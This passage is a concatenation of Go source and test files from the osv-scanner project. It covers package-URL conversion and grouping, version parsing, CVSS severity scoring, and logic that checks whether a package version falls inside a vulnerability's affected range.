					Ecosystem:  pkg.Package.Ecosystem,
					Deprecated: pkg.Package.Deprecated,
				},
				DepGroups:         slices.Clone(pkg.DepGroups),
				Vulnerabilities:   slices.Clone(pkg.Vulnerabilities),
				Groups:            slices.Clone(pkg.Groups),
				Licenses:          slices.Clone(pkg.Licenses),
				LicenseViolations: slices.Clone(pkg.LicenseViolations),
			}
		}
	}

	return grouped, errs
}

================================================
FILE: internal/utility/purl/package_grouper_test.go
================================================
package purl_test

import (
	"reflect"
	"testing"

	"github.com/google/osv-scanner/v2/internal/utility/purl"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
)

func TestGroupPackageByPURL_ShouldUnifyPackages(t *testing.T) {
	t.Parallel()
	input := []models.PackageSource{
		{
			Source: models.SourceInfo{
				Path: "/dir/lockfile.xml",
				Type: "",
			},
			Packages: []models.PackageVulns{
				{
					Package: models.PackageInfo{
						Name:      "foo.bar:the-first-package",
						Version:   "1.0.0",
						Ecosystem: string(osvconstants.EcosystemMaven),
					},
					Vulnerabilities: []*osvschema.Vulnerability{
						{Id: "GHSA-456"},
					},
					Groups: []models.GroupInfo{
						{
							IDs:     []string{"GHSA-456"},
							Aliases: []string{"GHSA-456"},
						},
					},
					DepGroups: []string{"build"},
				},
				{
					Package: models.PackageInfo{
						Name:      "foo.bar:the-first-package",
						Version:   "1.0.0",
						Ecosystem: string(osvconstants.EcosystemMaven),
					},
					Vulnerabilities: []*osvschema.Vulnerability{
						{Id: "GHSA-456"},
					},
					Groups: []models.GroupInfo{
						{
							IDs:     []string{"GHSA-456"},
							Aliases: []string{"GHSA-456"},
						},
					},
				},
				{
					Package: models.PackageInfo{
						Name:      "foo.bar:the-first-package",
						Version:   "1.0.0",
						Ecosystem: string(osvconstants.EcosystemMaven),
					},
					Vulnerabilities: []*osvschema.Vulnerability{
						{Id: "GHSA-456"},
					},
					Groups: []models.GroupInfo{
						{
							IDs:     []string{"GHSA-456"},
							Aliases: []string{"GHSA-456"},
						},
					},
				},
				{
					Package: models.PackageInfo{
						Name:      "foo.bar:package-2",
						Ecosystem: string(osvconstants.EcosystemMaven),
						Version:   "1.0.0",
					},
				},
			},
		},
		{
			Source: models.SourceInfo{
				Path: "/dir2/lockfile.json",
				Type: "",
			},
			Packages: []models.PackageVulns{
				{
					Package: models.PackageInfo{
						Name:      "foo.bar:the-first-package",
						Version:   "1.0.0",
						Ecosystem: string(osvconstants.EcosystemMaven),
					},
					Vulnerabilities: []*osvschema.Vulnerability{
						{Id: "GHSA-456"},
					},
					Groups: []models.GroupInfo{
						{
							IDs:     []string{"GHSA-456"},
							Aliases: []string{"GHSA-456"},
						},
					},
					DepGroups: []string{"test"},
				},
				{
					Package: models.PackageInfo{
						Name:      "foo.bar:package-2",
						Ecosystem: string(osvconstants.EcosystemMaven),
						Version:   "1.0.0",
					},
				},
			},
		},
	}

	result, errors := purl.Group(input)

	expected := map[string]models.PackageVulns{
		"pkg:maven/foo.bar/the-first-package@1.0.0": {
			Package: models.PackageInfo{
				Name:      "foo.bar:the-first-package",
				Version:   "1.0.0",
				Ecosystem: string(osvconstants.EcosystemMaven),
			},
			Vulnerabilities: []*osvschema.Vulnerability{
				{Id: "GHSA-456"},
			},
			Groups: []models.GroupInfo{
				{
					IDs:     []string{"GHSA-456"},
					Aliases: []string{"GHSA-456"},
				},
			},
			DepGroups: []string{"build", "test"},
		},
		"pkg:maven/foo.bar/package-2@1.0.0": {
Package: models.PackageInfo{
				Name:      "foo.bar:package-2",
				Version:   "1.0.0",
				Ecosystem: string(osvconstants.EcosystemMaven),
			},
		},
	}

	if len(errors) > 0 {
		t.Errorf("Unexpected errors: %v", errors)
	}

	if len(result) != len(expected) {
		t.Errorf("Expected %d packages, got %d", len(expected), len(result))
	}

	for expectedPURL, expectedInfo := range expected {
		info, exists := result[expectedPURL]

		if !exists {
			t.Errorf("Expected package %s to be in the results", expectedPURL)
		}
		if !reflect.DeepEqual(info, expectedInfo) {
			t.Errorf("Expected package %s to be %v, got %v", expectedPURL, expectedInfo, info)
		}
	}
}

================================================
FILE: internal/utility/purl/purl.go
================================================
// Package purl provides functionality for working with PURLs.
package purl

import (
	"fmt"

	"github.com/google/osv-scalibr/inventory/osvecosystem"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
	"github.com/package-url/packageurl-go"
)

// ParameterExtractor derives the PURL namespace and name from a package, or
// returns an error when the package name does not have the expected shape.
type ParameterExtractor func(packageInfo models.PackageInfo) (namespace string, name string, err error)

// EcosystemToPURLMapper maps an OSV ecosystem to the PURL type used for it.
var EcosystemToPURLMapper = map[osvconstants.Ecosystem]string{
	osvconstants.EcosystemMaven:       packageurl.TypeMaven,
	osvconstants.EcosystemGo:          packageurl.TypeGolang,
	osvconstants.EcosystemPackagist:   packageurl.TypeComposer,
	osvconstants.EcosystemPyPI:        packageurl.TypePyPi,
	osvconstants.EcosystemRubyGems:    packageurl.TypeGem,
	osvconstants.EcosystemNuGet:       packageurl.TypeNuget,
	osvconstants.EcosystemNPM:         packageurl.TypeNPM,
	osvconstants.EcosystemConanCenter: packageurl.TypeConan,
	osvconstants.EcosystemCratesIO:    packageurl.TypeCargo,
	osvconstants.EcosystemPub:         packageurl.TypePub,
	osvconstants.EcosystemHex:         packageurl.TypeHex,
	osvconstants.EcosystemCRAN:        packageurl.TypeCran,
}

// ecosystemPURLExtractor lists the ecosystems whose package names must be
// split into namespace and name.
var ecosystemPURLExtractor = map[osvconstants.Ecosystem]ParameterExtractor{
	osvconstants.EcosystemMaven:     FromMaven,
	osvconstants.EcosystemGo:        FromGo,
	osvconstants.EcosystemPackagist: FromComposer,
}

// FromPackage builds the PURL of a package.
//
// It fails when the ecosystem cannot be parsed, when the ecosystem has no
// entry in EcosystemToPURLMapper, or when the ecosystem's extractor rejects
// the package name.
//
// NOTE(review): ecosystems without an extractor pass Name through unchanged
// with an empty namespace, so an npm name such as "@scope/pkg" (constructed
// example) ends up entirely in the PURL name; confirm consumers expect that.
func FromPackage(packageInfo models.PackageInfo) (*packageurl.PackageURL, error) {
	eco, err := osvecosystem.Parse(packageInfo.Ecosystem)
	if err != nil {
		return nil, err
	}

	purlType, known := EcosystemToPURLMapper[eco.Ecosystem]
	if !known {
		return nil, fmt.Errorf("unable to determine purl type of %s@%s (%s)", packageInfo.Name, packageInfo.Version, packageInfo.Ecosystem)
	}

	// Default: no namespace, the package name as is.
	namespace, name := "", packageInfo.Name
	if extract, ok := ecosystemPURLExtractor[eco.Ecosystem]; ok {
		if namespace, name, err = extract(packageInfo); err != nil {
			return nil, err
		}
	}

	return packageurl.NewPackageURL(purlType, namespace, name, packageInfo.Version, nil, ""), nil
}

================================================
FILE: internal/utility/purl/purl_to_package.go
================================================
package purl

import (
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
	"github.com/package-url/packageurl-go"
)

// used like so: purlEcosystems[PkgURL.Type][PkgURL.Namespace]
// * means it should match any namespace string
var purlEcosystems = map[string]map[string]osvconstants.Ecosystem{
	"apk":      {"alpine": osvconstants.EcosystemAlpine},
	"cargo":    {"*": osvconstants.EcosystemCratesIO},
	"composer": {"*": osvconstants.EcosystemPackagist},
	"conan":    {"*": osvconstants.EcosystemConanCenter},
	"cran":     {"*": osvconstants.EcosystemCRAN},
	"deb": {
		"debian": osvconstants.EcosystemDebian,
		"ubuntu": osvconstants.EcosystemUbuntu,
	},
	"gem": {"*": osvconstants.EcosystemRubyGems},
	// We don't yet have a GIT ecosystem which aligns with the generic type better.
	// "generic": {"*": osvconstants.EcosystemOSSFuzz},
	"github":  {"*": osvconstants.EcosystemGitHubActions},
	"golang":  {"*": osvconstants.EcosystemGo},
	"hackage": {"*": osvconstants.EcosystemHackage},
	"hex":     {"*": osvconstants.EcosystemHex},
	"k8s":     {"*": osvconstants.EcosystemKubernetes},
	"maven":   {"*": osvconstants.EcosystemMaven},
	"npm":     {"*": osvconstants.EcosystemNPM},
	"nuget":   {"*": osvconstants.EcosystemNuGet},
	"pub":     {"*": osvconstants.EcosystemPub},
	"pypi":    {"*": osvconstants.EcosystemPyPI},
	"swift":   {"*": osvconstants.EcosystemSwiftURL},
}

// getPURLEcosystem returns the OSV ecosystem for a PURL's type and namespace,
// or the empty Ecosystem when purlEcosystems has no match.
func getPURLEcosystem(pkgURL packageurl.PackageURL) osvconstants.Ecosystem {
	byNamespace, known := purlEcosystems[pkgURL.Type]
	if !known {
		return osvconstants.Ecosystem("")
	}

	if anyNamespace, ok := byNamespace["*"]; ok {
		return anyNamespace
	}

	// A namespace that is not listed yields the map's zero value, which is
	// the empty Ecosystem.
	return byNamespace[pkgURL.Namespace]
}

// ToPackage converts a Package URL string to models.PackageInfo
//
// An error is returned only when the string cannot be parsed as a PURL. A
// PURL whose type or namespace is not listed in purlEcosystems is returned
// with an empty Ecosystem and a nil error, so callers have to check the
// Ecosystem field themselves.
func ToPackage(purl string) (models.PackageInfo, error) {
	parsedPURL, err := packageurl.FromString(purl)
	if err != nil {
		return models.PackageInfo{}, err
	}
	ecosystem := getPURLEcosystem(parsedPURL)

	// PackageInfo expects the full namespace in the name for ecosystems that specify it.
	name := parsedPURL.Name
	if namespace := parsedPURL.Namespace; namespace != "" {
		switch ecosystem {
		case osvconstants.EcosystemMaven:
			// Maven uses : to separate namespace and package
			name = namespace + ":" + name
		case osvconstants.EcosystemDebian, osvconstants.EcosystemAlpine, osvconstants.EcosystemUbuntu:
			// Debian, Alpine and Ubuntu repeat their namespace in the PURL,
			// so the bare package name is kept.
		default:
			name = namespace + "/" + name
		}
	}

	return models.PackageInfo{
		Name:      name,
		Ecosystem: string(ecosystem),
		Version:   parsedPURL.Version,
	}, nil
}

================================================
FILE: internal/utility/purl/purl_to_package_test.go
================================================
package purl_test

import (
	"reflect"
	"testing"

	"github.com/google/osv-scanner/v2/internal/utility/purl"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvconstants"
)

func TestPURLToPackage(t *testing.T) {
	t.Parallel()
	type args struct {
		purl string
	}
	tests := []struct {
		name    string
		args    args
		want    models.PackageInfo
		wantErr bool
	}{
		{
			name: "valid_PURL",
			args: args{
				purl: "pkg:cargo/memoffset@0.6.1",
			},
			want: models.PackageInfo{
				Name:      "memoffset",
				Version:   "0.6.1",
				Ecosystem: string(osvconstants.EcosystemCratesIO),
			},
		},
		{
			name: "valid_PURL_golang",
			args: args{
				purl: "pkg:golang/github.com/gogo/protobuf@5.6.0",
			},
			want: models.PackageInfo{
				Name:      "github.com/gogo/protobuf",
				Version:   "5.6.0",
				Ecosystem: string(osvconstants.EcosystemGo),
			},
		},
		{
			name: "valid_PURL_maven",
			args: args{
				purl: "pkg:maven/org.hdrhistogram/HdrHistogram@2.1.12",
			},
			want: models.PackageInfo{
				Name:      "org.hdrhistogram:HdrHistogram",
				Version:   "2.1.12",
				Ecosystem: string(osvconstants.EcosystemMaven),
			},
		},
		{
			name: "valid_PURL_Debian",
			args: args{
				purl: "pkg:deb/debian/nginx@2.36.1-8+deb11u1",
			},
			want: models.PackageInfo{
				Name:      "nginx",
				Version:   "2.36.1-8+deb11u1",
				Ecosystem: string(osvconstants.EcosystemDebian),
			},
		},
		{
			name: "valid_PURL_Ubuntu",
			args: args{
				purl: "pkg:deb/ubuntu/docker.io@20.10.12-0ubuntu2",
			},
			want: models.PackageInfo{
				Name:      "docker.io",
				Version:   "20.10.12-0ubuntu2",
				Ecosystem: string(osvconstants.EcosystemUbuntu),
			},
		},
		{
			name: "valid_PURL_alpine",
			args: args{
				purl: "pkg:apk/alpine/zlib@1.2.13-r0?arch=x86_64upstream=zlib&distro=alpine-3.17.2",
			},
			want: models.PackageInfo{
				Name:      "zlib",
				Version:   "1.2.13-r0",
				Ecosystem: string(osvconstants.EcosystemAlpine),
			},
		},
		{
			name: "invalid_PURL",
			args: args{
				purl: "pkg-golang/github.com/gogo/protobuf.0",
			},
			want:    models.PackageInfo{},
			wantErr: true,
		},
	}
	for _, tt := range tests {
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			got, err := purl.ToPackage(tt.args.purl)
			if (err != nil) != tt.wantErr {
				t.Errorf("PURLToPackage() error = %v, wantErr %v", err, tt.wantErr)
				return
			}
			if !reflect.DeepEqual(got, tt.want) {
				t.Errorf("PURLToPackage() = %v, want %v", got, tt.want)
			}
		})
	}
}

================================================
FILE: internal/utility/results/results.go
================================================
// Package results provides utility functions for working with scan results.
package results

import (
	"fmt"

	"github.com/google/osv-scanner/v2/pkg/models"
)

// ShortCommitLen is the number of characters to display a git commit
const ShortCommitLen = 8

// PkgToString renders a package for display: "name@version" when no commit is
// set, "name@shortcommit" when both a name and a commit are set, and the full
// commit when only a commit is set.
func PkgToString(pkgInfo models.PackageInfo) string {
	switch {
	case pkgInfo.Commit == "":
		// abc@v1.2.3
		return fmt.Sprintf("%s@%s", pkgInfo.Name, pkgInfo.Version)
	case pkgInfo.Name == "":
		// 1234567890abcdefghij1234567890abcdefghij
		return pkgInfo.Commit
	default:
		// https://github.com/google/osv-scanner@12345678
		return fmt.Sprintf("%s@%s", pkgInfo.Name, GetShortCommit(pkgInfo.Commit))
	}
}

// GetShortCommit truncates commit to at most ShortCommitLen bytes.
func GetShortCommit(commit string) string {
	if len(commit) <= ShortCommitLen {
		return commit
	}

	return commit[:ShortCommitLen]
}

================================================
FILE: internal/utility/semverlike/version-semver-like.go
================================================
// Package semverlike provides functionality to parse and compare version strings
// that are similar to semantic versioning, but with more flexibility.
// It is currently used to parse go mod versions to determine if a patch version exists.
package semverlike

import (
	"fmt"
	"math/big"
	"strings"

	"github.com/google/osv-scanner/v2/internal/cachedregexp"
)

// Components are individual components of each semver segment.
type Components []*big.Int

// Fetch returns the n-th component, or zero when there are not that many
// components.
func (components *Components) Fetch(n int) *big.Int {
	if n < len(*components) {
		return (*components)[n]
	}

	return big.NewInt(0)
}

// Cmp compares the receiver with b component by component, treating missing
// components as zero. It returns the result of the first differing pair, or
// 0 when all pairs are equal.
func (components *Components) Cmp(b Components) int {
	for i := range max(len(*components), len(b)) {
		if diff := components.Fetch(i).Cmp(b.Fetch(i)); diff != 0 {
			return diff
		}
	}

	return 0
}

// Version is a version that is _like_ a version as defined by the
// Semantic Version specification, except with potentially unlimited numeric
// components and a leading "v"
type Version struct {
	LeadingV   bool
	Components Components
	Build      string
	Original   string
}

// fetchComponentsAndBuild caps the components at maxComponents. Components
// beyond the cap are appended to the build string, each prefixed with ".".
func (v *Version) fetchComponentsAndBuild(maxComponents int) (Components, string) {
	if len(v.Components) <= maxComponents {
		return v.Components, v.Build
	}

	var build strings.Builder
	build.WriteString(v.Build)
	for _, overflow := range v.Components[maxComponents:] {
		fmt.Fprintf(&build, ".%d", overflow)
	}

	return v.Components[:maxComponents], build.String()
}

// ParseSemverLikeVersion parses line and keeps at most maxComponents numeric
// components; any further components are moved into the build string.
func ParseSemverLikeVersion(line string, maxComponents int) Version {
	parsed := parseSemverLike(line)
	components, build := parsed.fetchComponentsAndBuild(maxComponents)

	return Version{
		LeadingV:   parsed.LeadingV,
		Components: components,
		Build:      build,
		Original:   parsed.Original,
	}
}

// parseSemverLike splits line into an optional leading "v", numeric
// components separated by ".", and a build string that starts at the first
// character that is neither a digit nor ".".
func parseSemverLike(line string) Version {
	var components []*big.Int

	original := line
	digit := cachedregexp.MustCompile(`\d`)

	pending := ""
	inBuild := false

	// flush turns the digits collected so far into a component, if any.
	flush := func() {
		if pending == "" {
			return
		}
		v, _ := new(big.Int).SetString(pending, 10)
		components = append(components, v)
		pending = ""
	}

	leadingV := strings.HasPrefix(line, "v")
	line = strings.TrimPrefix(line, "v")

	for _, c := range line {
		// Everything after the build string started belongs to it, and a
		// digit before that point extends the current component.
		if inBuild || digit.MatchString(string(c)) {
			pending += string(c)
			continue
		}

		// c is not a digit and no build string has started, so c is either
		// a component terminator (.) or the first character of the build
		// string. Both end the component being collected.
		flush()

		// A terminator may be followed by another component, so the build
		// string does not start yet.
		if c == '.' {
			continue
		}

		// Anything else starts the build string.
		inBuild = true
		pending = string(c)
	}

	// Without a build string, whatever is still pending is a component.
	if !inBuild {
		flush()
	}

	return Version{
		LeadingV:   leadingV,
		Components: components,
		Build:      pending,
		Original:   original,
	}
}

================================================
FILE: internal/utility/severity/severity.go
================================================
// Package severity provides functionality for calculating vulnerability severity.
package severity

import (
	"strconv"
	"strings"

	"github.com/ossf/osv-schema/bindings/go/osvschema"
	gocvss20 "github.com/pandatix/go-cvss/20"
	gocvss30 "github.com/pandatix/go-cvss/30"
	gocvss31 "github.com/pandatix/go-cvss/31"
	gocvss40 "github.com/pandatix/go-cvss/40"
)

// Rating represents the severity level of a vulnerability.
type Rating string

// Rating values. UnknownRating is what the functions below report whenever no
// usable score could be derived.
const (
	CriticalRating Rating = "CRITICAL"
	HighRating     Rating = "HIGH"
	MediumRating   Rating = "MEDIUM"
	LowRating      Rating = "LOW"
	UnknownRating  Rating = "UNKNOWN"
)

// CalculateScore derives a numeric score and a rating string from a single
// OSV severity entry.
//
// The vector in severity.GetScore() is parsed by the go-cvss package that
// matches severity.GetType():
//   - CVSS_V2: base score of the 2.0 vector, rated on the CVSS 3.0 scale.
//   - CVSS_V3: dispatched on the "CVSS:3.0" / "CVSS:3.1" prefix of the vector.
//   - CVSS_V4: vec.Score() of the 4.0 vector.
//   - Ubuntu: the score string itself is returned as the rating and the
//     numeric score stays -1.
//
// The result is (-1, "UNKNOWN", nil) when the type is unspecified or has no
// case below, and also when a CVSS_V3 entry carries neither prefix: that
// situation is not reported as an error. A vector that fails to parse yields
// (-1, "UNKNOWN", err). Callers that compare the score against a severity
// threshold therefore need to treat -1 as "not scored", not as a low score.
func CalculateScore(severity *osvschema.Severity) (float64, string, error) {
	// Sentinel values, kept unless one of the cases below succeeds.
	score := -1.0
	rating := string(UnknownRating)
	var err error

	switch severity.GetType() {
	case osvschema.Severity_UNSPECIFIED:
		// UNSPECIFIED has no score information
	case osvschema.Severity_CVSS_V2:
		var vec *gocvss20.CVSS20
		vec, err = gocvss20.ParseVector(severity.GetScore())
		if err == nil {
			score = vec.BaseScore()
			// CVSS 2.0 does not define a rating, use CVSS 3.0's rating instead
			rating, err = gocvss30.Rating(score)
		}
	case osvschema.Severity_CVSS_V3:
		// The OSV type does not distinguish 3.0 from 3.1, so the vector prefix
		// selects the parser. There is no default branch: any other prefix
		// leaves the sentinels in place and err nil.
		switch {
		case strings.HasPrefix(severity.GetScore(), "CVSS:3.0"):
			var vec *gocvss30.CVSS30
			vec, err = gocvss30.ParseVector(severity.GetScore())
			if err == nil {
				score = vec.BaseScore()
				rating, err = gocvss30.Rating(score)
			}
		case strings.HasPrefix(severity.GetScore(), "CVSS:3.1"):
			var vec *gocvss31.CVSS31
			vec, err = gocvss31.ParseVector(severity.GetScore())
			if err == nil {
				score = vec.BaseScore()
				rating, err = gocvss31.Rating(score)
			}
		}
	case osvschema.Severity_CVSS_V4:
		var vec *gocvss40.CVSS40
		vec, err = gocvss40.ParseVector(severity.GetScore())
		if err == nil {
			score = vec.Score()
			rating, err = gocvss40.Rating(score)
		}
	case osvschema.Severity_Ubuntu:
		// The score string is passed through unchanged; it is not checked
		// against the Rating constants above.
		rating = severity.GetScore()
	}

	return score, rating, err
}

// CalculateOverallScore returns the highest score found in severities together
// with the rating that belongs to that score.
//
// The first entry for which CalculateScore fails aborts the whole calculation
// with (-1, "UNKNOWN", err), so one malformed vector hides the scores of the
// remaining entries. An empty slice yields (-1, "UNKNOWN", nil).
func CalculateOverallScore(severities []*osvschema.Severity) (float64, string, error) {
	maxScore := -1.0
	maxRating := string(UnknownRating)

	for _, severity := range severities {
		score, rating, err := CalculateScore(severity)
		if err != nil {
			return -1, string(UnknownRating), err
		}

		// Strict comparison: an entry whose score stayed at -1 (for example an
		// Ubuntu rating) never replaces the "UNKNOWN" default.
		if score > maxScore {
			maxScore = score
			maxRating = rating
		}
	}

	return maxScore, maxRating, nil
}

// CalculateRating converts a numeric score given as a string into a Rating.
// A string that does not parse as a float returns UnknownRating and the parse
// error; a rating of "NONE", or an error from the rating lookup, is reported
// as UnknownRating.
func CalculateRating(score string) (Rating, error) {
	// All CVSS versions' rating methods are identical.
parsedScore, err := strconv.ParseFloat(score, 64) if err != nil { return UnknownRating, err } rating, err := gocvss30.Rating(parsedScore) if err != nil || rating == "NONE" { rating = string(UnknownRating) } return Rating(rating), err } ================================================ FILE: internal/utility/severity/severity_test.go ================================================ package severity_test import ( "math" "testing" "github.com/google/osv-scanner/v2/internal/utility/severity" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func TestSeverity_CalculateScore(t *testing.T) { t.Parallel() type result struct { score float64 rating string } tests := []struct { name string sev *osvschema.Severity want result }{ { name: "Empty_Severity_Type", sev: &osvschema.Severity{}, want: result{ score: -1, rating: "UNKNOWN", }, }, { name: "CVSS_v2.0", sev: &osvschema.Severity{ Type: osvschema.Severity_CVSS_V2, Score: "AV:L/AC:M/Au:N/C:N/I:P/A:C/E:H/RL:U/RC:C/CDP:LM/TD:M/CR:L/IR:M/AR:H", }, want: result{ score: 5.4, rating: "MEDIUM", }, }, { name: "CVSS_v3.0", sev: &osvschema.Severity{ Type: osvschema.Severity_CVSS_V3, Score: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:T/RC:U/CR:L/IR:L/AR:H/MAV:P/MAC:H/MPR:H/MUI:R/MS:C/MC:H/MI:H/MA:H", }, want: result{ score: 10.0, rating: "CRITICAL", }, }, { name: "CVSS_v3.1", sev: &osvschema.Severity{ Type: osvschema.Severity_CVSS_V3, Score: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:T/RC:U/CR:L/IR:L/AR:H/MAV:P/MAC:H/MPR:H/MUI:R/MS:C/MC:H/MI:H/MA:H", }, want: result{ score: 10.0, rating: "CRITICAL", }, }, { name: "CVSS_v4.0", sev: &osvschema.Severity{ Type: osvschema.Severity_CVSS_V4, Score: "CVSS:4.0/AV:P/AC:H/AT:P/PR:H/UI:A/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:L/IR:L/AR:L/MAV:P/MAC:H/MAT:P/MPR:H/MUI:A/MVC:N/MVI:N/MVA:N/MSC:N/MSI:N/MSA:N/S:N/AU:N/R:A/V:D/RE:L/U:Clear", }, want: result{ score: 0.0, rating: "NONE", }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() gotScore, gotRating, 
err := severity.CalculateScore(tt.sev) if err != nil { t.Errorf("CalculateScore() error: %v", err) } // CVSS scores are only supposed to be to 1 decimal place. // Multiply and round to get around potential precision issues. if math.Round(10*gotScore) != math.Round(10*tt.want.score) || gotRating != tt.want.rating { t.Errorf("CalculateScore() = (%.1f, %s), want (%.1f, %s)", gotScore, gotRating, tt.want.score, tt.want.rating) } }) } } ================================================ FILE: internal/utility/vulns/vulnerabilities.go ================================================ // Package vulns provides utility functions for working with vulnerabilities. package vulns import "github.com/ossf/osv-schema/bindings/go/osvschema" func Include(vs []*osvschema.Vulnerability, vulnerability *osvschema.Vulnerability) bool { for _, vuln := range vs { if vuln.GetId() == vulnerability.GetId() { return true } } return false } ================================================ FILE: internal/utility/vulns/vulnerabilities_test.go ================================================ package vulns_test import ( "testing" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func TestVulnerabilities_Includes(t *testing.T) { t.Parallel() type args struct { osv *osvschema.Vulnerability } tests := []struct { name string vs []*osvschema.Vulnerability args args want bool }{ { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-2", Aliases: []string{}, }, }, want: false, }, { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-1", Aliases: []string{}, }, }, want: true, }, { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{"GHSA-2"}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-2", Aliases: []string{}, }, }, want: false, }, { name: 
"", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-2", Aliases: []string{"GHSA-1"}, }, }, want: false, }, { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{"CVE-1"}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-2", Aliases: []string{"CVE-1"}, }, }, want: false, }, { name: "", vs: []*osvschema.Vulnerability{ { Id: "GHSA-1", Aliases: []string{"CVE-2"}, }, }, args: args{ osv: &osvschema.Vulnerability{ Id: "GHSA-2", Aliases: []string{"CVE-2"}, }, }, want: false, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := vulns.Include(tt.vs, tt.args.osv); got != tt.want { t.Errorf("Includes() = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/utility/vulns/vulnerability.go ================================================ package vulns import ( "slices" "sort" "strings" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/inventory/osvecosystem" "github.com/google/osv-scalibr/semantic" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func eventVersion(e *osvschema.Event) string { if e.GetIntroduced() != "" { return e.GetIntroduced() } if e.GetFixed() != "" { return e.GetFixed() } if e.GetLimit() != "" { return e.GetLimit() } if e.GetLastAffected() != "" { return e.GetLastAffected() } return "" } func rangeContainsVersion(ar *osvschema.Range, pkg *extractor.Package) bool { if ar.GetType() != osvschema.Range_ECOSYSTEM && ar.GetType() != osvschema.Range_SEMVER { return false } // todo: we should probably warn here if len(ar.GetEvents()) == 0 { return false } vp := semantic.MustParse(imodels.Version(pkg), string(imodels.Ecosystem(pkg).Ecosystem)) sort.Slice(ar.GetEvents(), func(i, j int) bool { a := ar.GetEvents()[i] b := ar.GetEvents()[j] if 
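a.GetIntroduced() == "0" {
			return true
		}

		if b.GetIntroduced() == "0" {
			return false
		}

		// Ignore errors as we assume the version is correct
		// NOTE(review): eventVersion values come from advisory data. MustParse
		// presumably panics on input it cannot parse (Must* convention), and the
		// CompareStr error is discarded - confirm both are acceptable here.
		order, _ := semantic.MustParse(eventVersion(a), string(imodels.Ecosystem(pkg).Ecosystem)).CompareStr((eventVersion(b)))

		return order < 0
	})

	// Walk the sorted events as a small state machine: an "introduced" event at
	// or below the package version switches affected on, and a later "fixed" or
	// "last_affected" event decides whether it stays on.
	var affected bool
	for _, e := range ar.GetEvents() {
		if affected {
			if e.GetFixed() != "" {
				// NOTE(review): the comparison error is dropped. If CompareStr
				// returns 0 together with an error, this branch marks the version
				// as NOT affected, which is the unsafe direction for a scanner -
				// confirm what CompareStr returns on failure.
				order, _ := vp.CompareStr(e.GetFixed())
				affected = order < 0
			} else if e.GetLastAffected() != "" {
				order, _ := vp.CompareStr(e.GetLastAffected())
				affected = e.GetLastAffected() == imodels.Version(pkg) || order <= 0
			}
		} else if e.GetIntroduced() != "" {
			order, _ := vp.CompareStr(e.GetIntroduced())
			affected = e.GetIntroduced() == "0" || order >= 0
		}
	}

	return affected
}

// rangeAffectsVersion checks if the given version is within the range
// specified by the events of any "Ecosystem" or "Semver" type ranges.
//
// Ranges of any other type (for example GIT) are skipped. It returns true as
// soon as one ECOSYSTEM or SEMVER range contains the package version, and
// false when none does or when a is empty.
func rangeAffectsVersion(a []*osvschema.Range, pkg *extractor.Package) bool {
	for _, r := range a {
		// Skip instead of returning: an advisory may list a GIT range ahead of
		// its ECOSYSTEM/SEMVER range, and returning false here would leave the
		// later ranges unchecked and report an affected package as unaffected.
		if r.GetType() != osvschema.Range_ECOSYSTEM && r.GetType() != osvschema.Range_SEMVER {
			continue
		}

		if rangeContainsVersion(r, pkg) {
			return true
		}
	}

	return false
}

// AffectsEcosystem reports whether any "affected" entry of v names a package
// in ecosystemAffected. Only the ecosystem is compared; package names and
// versions are not looked at.
func AffectsEcosystem(v *osvschema.Vulnerability, ecosystemAffected osvecosystem.Parsed) bool {
	for _, affected := range v.GetAffected() {
		// NOTE(review): the ecosystem string is advisory data; MustParse
		// presumably panics on a value it cannot parse - confirm.
		if osvecosystem.MustParse(affected.GetPackage().GetEcosystem()).Equal(ecosystemAffected) {
			return true
		}
	}

	return false
}

// NormalizeRepo applies some reasonable transformations to repository urls to
// ensure accurate results when determining if two repository urls are referencing
// the same repository.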
//
// Specifically, common protocols are removed from the start of the url and the
// ".git" suffix if present
//
// Only the "https://", "http://" and "git://" prefixes are stripped, in that
// order. Anything else (other schemes, letter case, a trailing slash) is left
// as given, so two spellings of one repository that differ in those respects
// still compare as different.
func NormalizeRepo(repo string) string {
	for _, scheme := range []string{"https://", "http://", "git://"} {
		repo = strings.TrimPrefix(repo, scheme)
	}

	return strings.TrimSuffix(repo, ".git")
}

// hasGitRangeForRepo reports whether affected has a GIT range whose repository,
// after NormalizeRepo, equals the normalized repo.
func hasGitRangeForRepo(affected *osvschema.Affected, repo string) bool {
	wanted := NormalizeRepo(repo)

	return slices.ContainsFunc(affected.GetRanges(), func(r *osvschema.Range) bool {
		return r.GetType() == osvschema.Range_GIT && NormalizeRepo(r.GetRepo()) == wanted
	})
}

// IsAffected reports whether the advisory v applies to pkg.
//
